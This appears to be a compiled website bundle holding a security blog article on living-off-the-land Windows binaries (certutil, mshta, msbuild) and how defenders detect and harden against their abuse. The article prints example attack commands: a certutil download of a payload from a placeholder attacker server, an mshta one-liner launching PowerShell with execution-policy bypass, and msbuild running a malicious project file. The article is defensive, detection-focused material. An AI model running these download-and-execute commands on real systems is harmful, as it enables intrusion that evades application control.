1"use strict";(self.webpackChunkveil_framework=self.webpackChunkveil_framework||[]).push([[7485],{804:function(e,t,n){n.r(t),n.d(t,{Head:function(){return E},default:function(){return h}});var l=n(8453),a=n(6540);function r(e){const t=Object.assign({h1:"h1",p:"p",h2:"h2",ul:"ul",li:"li",strong:"strong",code:"code",a:"a",h3:"h3",pre:"pre",ol:"ol",hr:"hr",em:"em"},(0,l.RP)(),e.components);return a.createElement(a.Fragment,null,a.createElement(t.h1,null,"Living Off the Land Binaries (LOLBAS) in 2026: Techniques and Detection"),"\n",a.createElement(t.p,null,"Living-off-the-land binaries â legitimate, signed system tools used for malicious purposes â remain one of the most effective evasion techniques in 2026. The concept is simple: why bring your own tools when the operating system already provides everything you need? Certutil downloads payloads. MSBuild compiles and executes code. Rundll32 loads arbitrary DLLs. MSHTA executes scripts. All of these are Microsoft-signed binaries that exist on every Windows installation."),"\n",a.createElement(t.p,null,"The LOLBAS project catalogs over 200 Windows binaries, scripts, and libraries with documented offensive use cases. For defenders, the challenge is not identifying these binaries â they are well-known â but distinguishing legitimate administrative use from malicious abuse."),"\n",a.createElement(t.h2,null,"What Changed Recently"),"\n",a.createElement(t.p,null,"LOLBAS techniques have been documented for years, but several trends reshaped the landscape in 2025â26:"),"\n",a.createElement(t.ul,null,"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Application control adoption drives LOLBAS growth")," â As more organizations deploy AppLocker or WDAC, traditional executable-based attacks fail. Attackers shift to system binaries that are always whitelisted, making LOLBAS more relevant, not less."),"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"New LOLBAS discoveries")," â The community continues to find offensive capabilities in obscure system utilities. Several new binaries were added to the LOLBAS project in 2025, including developer tools, management utilities, and diagnostics tools."),"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"LOLBAS chaining")," â Sophisticated attack chains combine multiple LOLBAS binaries in sequence. For example: ",a.createElement(t.code,null,"certutil")," downloads a payload â ",a.createElement(t.code,null,"expand")," decompresses it â ",a.createElement(t.code,null,"msbuild")," compiles and executes it. Each step uses a different signed binary, making signature-based detection impractical."),"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Cloud-hosted LOLBAS")," â Attackers host payloads on legitimate cloud services (as discussed in the ",a.createElement(t.a,{href:"/living-off-the-cloud-how-attackers-abuse-cloud-apis-for-stealthy-c2/"},"cloud C2 article"),") and use LOLBAS binaries to download them. The combination of a trusted download URL and a trusted download tool defeats most network and endpoint detection."),"\n"),"\n",a.createElement(t.h3,null,"Most Abused LOLBAS Categories in 2026"),"\n",a.createElement(t.p,null,"| Category | Binaries | Abuse Type |\n|---|---|---|\n| Download / Transfer | certutil, bitsadmin, curl, powershell | Fetch payloads from remote URLs |\n| Execution | msbuild, mshta, rundll32, regsvr32 | Execute arbitrary code or DLLs |\n| Script Execution | wscript, cscript, powershell | Run scripts without traditional executables |\n| Compile | msbuild, csc, jsc | Compile and execute code on-target |\n| By
1pass | msiexec, forfiles, pcalua | Launch processes that bypass application control |\n| Reconnaissance | dsquery, nltest, net.exe | Active Directory and network enumeration |"),"\n",a.createElement(t.h2,null,"How LOLBAS Abuse Works at a Conceptual Level"),"\n",a.createElement(t.p,null,"Every LOLBAS technique exploits the same fundamental property: the binary is trusted by the operating system and security tools. This trust comes from being:"),"\n",a.createElement(t.ul,null,"\n",a.createElement(t.li,null,"Microsoft-signed with a valid Authenticode signature"),"\n",a.createElement(t.li,null,"Pre-installed on Windows (no deployment required)"),"\n",a.createElement(t.li,null,"Included in default application control allow lists"),"\n",a.createElement(t.li,null,"Executing in a legitimate process context"),"\n"),"\n",a.createElement(t.h3,null,"Common LOLBAS Attack Patterns"),"\n",a.createElement(t.p,null,a.createElement(t.strong,null,"Download and Execute")),"\n",a.createElement(t.pre,null,a.createElement(t.code,null,"certutil -urlcache -split -f https://[attacker-server]/payload.exe C:\\temp\\payload.exe\n")),"\n",a.createElement(t.p,null,"Certutil is a certificate management tool. Its URL cache feature is regularly abused to download arbitrary files. The download originates from a Microsoft-signed binary, which many web proxies and endpoint tools trust."),"\n",a.createElement(t.p,null,a.createElement(t.strong,null,"Inline Script Execution")),"\n",a.createElement(t.pre,null,a.createElement(t.code,null,'mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -c IEX(...)"":close")\n')),"\n",a.createElement(t.p,null,"MSHTA executes HTA (HTML Application) content, including inline VBScript. This launches PowerShell without a direct parent-child relationship from the original delivery mechanism."),"\n",a.createElement(t.p,null,a.createElement(t.strong,null,"Code Compilation and Execution")),"\n",a.createElement(t.pre,null,a.createElement(t.code,null,"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\msbuild.exe malicious.csproj\n")),"\n",a.createElement(t.p,null,"MSBuild compiles and executes .NET project files. An attacker can drop a ",a.createElement(t.code,null,".csproj")," file containing arbitrary C# code and execute it through MSBuild without any compiled executable touching disk."),"\n",a.createElement(t.h2,null,"Where Defenders Can Observe It"),"\n",a.createElement(t.h3,null,"Process Creation Monitoring"),"\n",a.createElement(t.ul,null,"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Command-line logging")," â The most valuable telemetry for LOLBAS detection. The binary name alone is not suspicious â it is the arguments that reveal abuse. ",a.createElement(t.code,null,"certutil -urlcache -split -f")," with an external URL is a clear indicator."),"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Parent-child relationships")," â ",a.createElement(t.code,null,"mshta.exe")," spawned by ",a.createElement(t.code,null,"outlook.exe")," (email attachment) has a different risk profile than ",a.createElement(t.code,null,"mshta.exe")," spawned by ",a.createElement(t.code,null,"explorer.exe")," (user double-click). Track the full process tree."),"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Sysmon Event ID 1")," â Process creation with full command line. This is the foundation for LOLBAS detection."),"\n"),"\n",a.createElement(t.h3,null,"File System Monitoring"),"\n",a.createElement(t.ul,null,"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Unusual file writes in temp directories")," â LOLBAS download tools write to disk. Certutil writes to the specified path. Monitor for executable or script file creation in temp directories by system utility processes."),"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Project file creation")," â ",a.createElement(t.code,null,".csproj"),", ",a.createElement(t.code,null,".sln"),", and ",a.createElement(t.code,null,".vbproj")," files appearing in user-writable directories may indicate MSBuild abuse."),"\n"),"\n",a.createElement(t.h3,null,"Network Monitoring"),"\n",a.createElement(t.ul,null,"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Unusual outbound connections from system utilities")," â Certutil, BITSAdmin, and MSBuild should not be making outbound HTTP connections in most environments. Alert on network connections from these processes."),"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"DNS queries from unexpected processes")," â System utilities resolving external hostnames is a signal."),"\n"),"\n",a.createElement(t.h2,null,"Common Detection Blind Spots"),"\n",a.createElement(t.ol,null,"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Binary name only detection")," â Alerting on ",a.createElement(t.code,null,"certutil.exe")," execution without examining the command line produces overwhelming false positives from legitimate certificate operations."),"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"No command-line logging")," â Without full command-line arguments, LOLBAS abuse is
1invisible to process monitoring."),"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Trusted parent exception")," â Some detection rules exclude processes spawned by trusted parents like ",a.createElement(t.code,null,"svchost.exe")," or ",a.createElement(t.code,null,"services.exe"),". Attackers chain LOLBAS through these trusted contexts to avoid detection."),"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Developer tooling exceptions")," â Environments with developers may whitelist MSBuild, CSC, and other compilation tools, creating a blind spot for code execution abuse."),"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"BITS Jobs")," â BITSAdmin jobs (and the BITS service) can persist across reboots and execute downloads on a schedule. Many organizations do not monitor BITS job creation."),"\n"),"\n",a.createElement(t.h2,null,"Practical Hardening and Monitoring Guidance"),"\n",a.createElement(t.h3,null,"For Detection Engineering Teams"),"\n",a.createElement(t.ul,null,"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Build argument-aware detections")," â For every known LOLBAS binary, create detection rules that trigger on specific suspicious argument patterns. The LOLBAS project provides the documented offensive arguments for each binary."),"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Track process trees")," â A single binary in isolation may be benign. The chain of: email client â script host â LOLBAS downloader â LOLBAS executor tells a story. Build multi-stage detections."),"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Monitor for BITS job creation")," â Sysmon Event ID 1 for ",a.createElement(t.code,null,"bitsadmin.exe")," with job creation arguments, or direct monitoring of the BITS event log."),"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Baseline legitimate use")," â Many LOLBAS binaries have legitimate uses. Understanding the normal usage pattern in your environment is essential for building high-fidelity detections. Certutil is legitimately used by IT teams â but only for specific operations from specific source contexts."),"\n"),"\n",a.createElement(t.h3,null,"For System Administrators"),"\n",a.createElement(t.ul,null,"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Restrict unnecessary utilities")," â If your environment does not need MSHTA, remove or block it. Use AppLocker or WDAC to deny-list specific LOLBAS binaries that have no legitimate use in your environment."),"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Enforce Constrained Language Mode")," â CLM restricts PowerShell's capabilities, which is the most commonly abused LOLBAS binary."),"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Deploy ASR rules")," â Attack Surface Reduction rules specifically target several LOLBAS patterns: blocking Office child processes, preventing script execution from email, and restricting WMIC and PSExec."),"\n",a.createElement(t.li,null,a.createElement(t.strong,null,"Monitor developer environments separately")," â Development systems legitimately use MSBuild and CSC. Separate monitoring baselines for development and production environments prevent false-positive fatigue."),"\n"),"\n",a.createElement(t.h3,null,"Lab Testing Context"),"\n",a.createElement(t.p,null,"In a controlled lab, the ",a.createElement(t.a,{href:"/framework/"},"Veil Framework")," generates payloads that can be delivered and executed using LOLBAS techniques. Testing your detection coverage by delivering Veil payloads via certutil, executing them through MSBuild, and observing whether your detection stack catches the full chain validates your LOLBAS monitoring."),"\n",a.createElement(t.p,null,"The ",a.createElement(t.a,{href:"/defensive-lab-guide-safely-analyzing-veil-payloads-in-a-sandbox/"},"sandbox analysis guide")," provides the lab setup details. Earlier articles on ",a.createElement(t.a,{href:"/fileless-malware-surge-2026-trends-in-memory-only-attacks/"},"fileless malware")," and ",a.createElement(t.a,{href:"/why-process-injection-t1055-dominates-2026-attack-trends/"},"process injection")," are directly related since LOLBAS techniques are often the entry point for fileless execution chains."),"\n",a.createElement(t.h2,null,"Related Reading"),"\n",a.createElement(t.ul,null,"\n",a.createElement(t.li,null,a.createElement(t.a,{href:"/framework/"},"Veil Framework Overview")),"\n",a.createElement(t.li,null,a.createElement(t.a,{href:"/framework/veil-evasion/"},"Veil-Evasion Module")),"\n",a.createElement(t.li,null,a.createElement(t.a,{href:"/powershell-payloads/"},"PowerShell Payloads in Security Testing")),"\n",a.createElement(t.li,null,a.createElement(t.a,{href:"/fileless-malware-surge-2026-trends-in-memory-only-attacks/"},"Fileless Malware Surge: 2026 Trends in Memory-Only Attacks")),"\n",a.createElement(t.li,null,a.createElement(t.a,{href:"/defensive-lab-guide-safely-analyzing-veil-payloads-in-a-sandbox/"},"Defensive Lab Guide: Safely Analyzing Veil Payloads in a Sandbox")),"\n",a.createElement(t.li,null,a.createElement(t.a,{href:"/guides/"},"Guides and Tutorials")),"\n"),"\n",a.createElement(t.hr),"\n",a.createElement(t.p,null,a.createElement(t.em,null,"The most dangerous tools are the ones already on the system. LOLBAS detection is not about blocking binaries â it is about understanding how those binaries are used and building detections that distinguish administration from attack.")))}var i=function(e={}){const{wrapper:t}=Object.assign({},(0,l.RP)(),e.components);return t?a.createElement(t,e,a.createElement(r,e)):r(e)},s=n(9329),o=n(1744),c=n(8963),m=n(8752),u=n(7304);function d(e){if(!e)return null;try{return new Intl.DateTimeFormat("en-GB",{day:"numeric",month:"long",year:"numeric",timeZone:"UTC"}).format(new Date(e))}catch{return null}}function p({pageContext:e,children:t}){const{frontmatter:n}=e,l=(null==n?void 0:n.title)||"",r=(null==n?void 0:n.description)||"",i=(null==n?void 0:n.slug)||"",o=(null==n?void 0:n.heroImage)||null,p=(null==n?void 0:n.date)||null,h=(null==n?void 0:n.lastmod)||null,E=d(p),f=h&&h!==p?d(h):null;return a.createElement(s.A,null,o&&a.createElement(c.A,{title:l,subt
1itle:r,backgroundImage:o}),a.createElement("article",{className:"page-content"},a.createElement("div",{className:"container"},E&&a.createElement("p",{className:"post-meta"},a.createElement("time",{dateTime:p},"Published ",E),f&&a.createElement(a.Fragment,null," · ",a.createElement("time",{dateTime:h},"Updated ",f))),a.createElement("div",{className:"post-layout-grid"},a.createElement("div",{className:"post-main"},t),a.createElement("aside",{className:"post-sidebar","aria-label":"Sidebar"},a.createElement("div",{className:"post-sidebar-scroll"},a.createElement(u.A),a.createElement(m.A,{sourceUrl:i})))))))}function h(e){return a.createElement(p,e,a.createElement(i,e))}function E({pageContext:e}){const{frontmatter:t}=e,n=null!=t&&t.heroImage?`https://www.veil-framework.com${t.heroImage}`:null;return a.createElement(o.A,{title:null==t?void 0:t.title,description:null==t?void 0:t.description,pathname:null==t?void 0:t.slug},(null==t?void 0:t.date)&&a.createElement("meta",{property:"article:published_time",content:t.date}),(null==t?void 0:t.lastmod)&&a.createElement("meta",{property:"article:modified_time",content:t.lastmod}),n&&a.createElement("meta",{property:"og:image",content:n}),n&&a.createElement("meta",{name:"twitter:image",content:n}))}},7304:function(e,t,n){n.d(t,{A:function(){return r}});
1var l=n(6540);function a({href:e,children:t,className:n,...a}){return l.createElement("a",Object.assign({href:e,target:"_blank",rel:"sponsored nofollow noopener",className:n},a),t)}function r(){const e="/veil-recommends/infosec-fundamentals";return l.createElement("aside",{className:"fc-wrap","aria-label":"Recommended course"},l.createElement("div",{className:"fc-header"},l.createElement("span",{className:"fc-dot fc-dot-r","aria-hidden":"true"}),l.createElement("span",{className:"fc-dot fc-dot-a","aria-hidden":"true"}),l.createElement("span",{className:"fc-dot fc-dot-g","aria-hidden":"true"}),l.createElement("span",{className:"fc-header-label"},"course_spotlight.sh")),l.createElement(a,{href:e,className:"fc-image-link","aria-label":"View Information Security Fundamentals course"},l.createElement("img",{src:"/img/hero/infosec-fundamentals.webp",alt:"Information Security Fundamentals course cover",className:"fc-image",loading:"lazy",width:"300",height:"169"})),l.createElement("div",{className:"fc-body"},l.createElement("div",{className:"fc-tag"},"Recommended Course"),l.createElement("h3",{className:"fc-title"},l.createElement(a,{href:e,className:"fc-title-link"},"Information Security Fundamentals")),l.createElement("p",{className:"fc-desc"},"Build a solid foundation in cybersecurity. Covers network fundamentals, common attack vectors, defensive controls, and the mindset needed for security research."),l.createElement("ul",{className:"fc-features"},l.createElement("li",{className:"fc-feature"},l.createElement("span",{className:"fc-feature-icon","aria-hidden":"true"},"â¸"),"Beginner-friendly â no prior experience needed"),l.createElement("li",{className:"fc-feature"},l.createElement("span",{className:"fc-feature-icon","aria-hidden":"true"},"â¸"),"Network attacks & defences"),l.createElement("li",{className:"fc-feature"},l.createElement("span",{className:"fc-feature-icon","aria-hidden":"true"},"â¸"),"Real-world security concepts")),l.createElement(a,{href:e,className:"fc-cta"},"View Course",l.createElement("span",{className:"fc-cta-arrow","aria-hidden":"true"}," â")),l.createElement("p",{className:"fc-disclosure"},"We may earn a commission if you enrol via our link, at no extra cost to you.")))}},8453:function(e,t,n){n.d(t,{RP:function(){return r}});
1var l=n(6540);const a=l.createContext({});function r(e){const t=l.useContext(a);return l.useMemo(()=>"function"==typeof e?e(t):{...t,...e},[t,e])}},8752:function(e,t,n){n.d(t,{A:function(){return a}});var l=n(6540);function a({sourceUrl:e}){const{0:t,1:n}=(0,l.useState)("idle"),{0:a,1:r}=(0,l.useState)("");return l.createElement("aside",{className:"nl-sw-wrap","aria-label":"Newsletter signup"},l.createElement("div",{className:"nl-sw-header"},l.createElement("span",{className:"nl-sw-dot nl-sw-dot-r","aria-hidden":"true"}),l.createElement("span",{className:"nl-sw-dot nl-sw-dot-a","aria-hidden":"true"}),l.createElement("span",{className:"nl-sw-dot nl-sw-dot-g","aria-hidden":"true"}),l.createElement("span",{className:"nl-sw-title"},"intel_feed.sh")),l.createElement("div",{className:"nl-sw-body"},l.createElement("p",{className:"nl-sw-prompt"},l.createElement("span",{className:"nl-sw-caret","aria-hidden":"true"},"$")," ","subscribe --to evasion-intel"),l.createElement("h3",{className:"nl-sw-heading"},"Stay ahead of the curve"),l.createElement("p",{className:"nl-sw-desc"},"AV bypass techniques, detection gaps, and lab-tested research â delivered before the mainstream catches up."),"done"===t?l.createElement("div",{className:"nl-sw-success",role:"status"},l.createElement("span",{className:"nl-sw-check","aria-hidden":"true"},"â"),l.createElement("div",null,l.createElement("strong",null,"Subscribed."),l.createElement("br",null),l.createElement("span",{className:"nl-sw-success-sub"},"Confirm your email to activate."))):l.createElement("form",{onSubmit:async function(e){e.preventDefault();const t=e.currentTarget,l=new FormData(t);if(!l.get("company")){n("loading"),r("");try{const e=await fetch("/api/subscribe",{method:"POST",body:l}),a=await e.json();a.success?(n("done"),t.reset()):(n("err"),r(a.error||"Something went wrong."))}catch{n("err"),r("Network error â please try again.")}}},className:"nl-sw-form",noValidate:!0},l.createElement("input",{type:"hidden",name:"site",value:"veil-framework"}),l.createElement("input",{type:"hidden",name:"source_url",value:e||""}),l.createElement("input",{type:"text",name:"company",tabIndex:"-1","aria-hidden":"true",className:"nl-sw-hp",autoComplete:"off"}),l.createElement("label",{htmlFor:"nl-sw-name",className:"nl-sw-label"},"Your name"),l.createElement("input",{id:"nl-sw-name",type:"text",name:"name",placeholder:"alias or handle",required:!0,autoComplete:"given-name",className:"nl-sw-input",disabled:"loading"===t}),l.createElement("label",{htmlFor:"nl-sw-email",className:"nl-sw-label"},"Email address"),l.createElement("input",{id:"nl-sw-email",type:"email",name:"email",placeholder:"[email protected]",required:!0,autoComplete:"email",className:"nl-sw-input",disabled:"loading"===t}),"err"===t&&l.createElement("p",{className:"nl-sw-error",role:"alert"},a),l.createElement("button",{type:"submit",className:"nl-sw-btn",disabled:"loading"===t},"loading"===t?"Connectingâ¦":"Subscribe to intel â"),l.createElement("p",{className:"nl-sw-legal"},"No spam. No vendor fluff. Unsubscribe any time."))))}},8963:function(e,t,n){n.d(t,{A:function(){return a}});
1var l=n(6540);function a({title:e,subtitle:t,primaryLink:n,primaryText:a,secondaryLink:r,secondaryText:i,backgroundImage:s}){const o=s?{backgroundImage:`linear-gradient(135deg, rgba(37, 99, 235, 0.85) 0%, rgba(13, 33, 55, 0.9) 100%), url(${s})`,backgroundSize:"cover",backgroundPosition:"center"}:{};return l.createElement("section",{className:"hero blueprint-section-subtle",style:o},l.createElement("div",{className:"container"},l.createElement("h1",null,e),t&&l.createElement("p",null,t),(n||r)&&l.createElement("div",{style:{display:"flex",gap:"var(--space-md)",flexWrap:"wrap"}},n&&l.createElement("a",{href:n,className:"btn btn-primary"},a||"Get Started"),r&&l.createElement("a",{href:r,className:"btn btn-outline"},i||"Learn More"))))}}}]); 2//# sourceMappingURL=component---src-components-page-template-jsx-content-file-path-content-posts-lolbas-2026-techniques-and-detection-mdx-cda3952728c3a23d925b.js.map
Line numbers count LF bytes from the start of the resource, as the search results do. Vendor segments are library code the classifier recognised; they are stored but not indexed. Bytes are shown as Latin1 characters, one per byte.